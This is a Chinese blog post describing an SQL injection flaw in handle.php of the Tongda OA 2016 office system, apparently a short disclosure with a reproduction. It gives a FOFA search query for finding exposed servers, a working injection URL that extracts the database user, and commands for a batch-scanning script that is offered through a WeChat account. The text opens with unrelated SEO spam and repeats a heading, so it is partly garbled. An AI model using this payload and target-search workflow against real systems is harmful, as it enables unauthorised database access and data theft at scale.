专业做网站建设公司哪家好,免费一键搭建网站,摄影作品网站推荐,网址修改一、漏洞描述
北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞#xff0c;攻击者可利用此漏洞获取数据库管理员权限#xff0c;查询数据、获取系统信息#xff0c;威胁企业单位数据安全。 二、网络空间搜索引擎查询
fofa查询
appT…一、漏洞描述
北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞攻击者可利用此漏洞获取数据库管理员权限查询数据、获取系统信息威胁企业单位数据安全。 二、网络空间搜索引擎查询
fofa查询
appTDXK-通达OA body2016 三、漏洞复现
poc
/share/handle.php?_GET[module]1%27and1{%271}and10unionselect(select/**/user())--%27 浏览器直接访问 四、批量检测
单个检测 python .\TdOA2016.py -u http://ip:port 批量检测 python .\TdOA2016.py -u filename 微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本
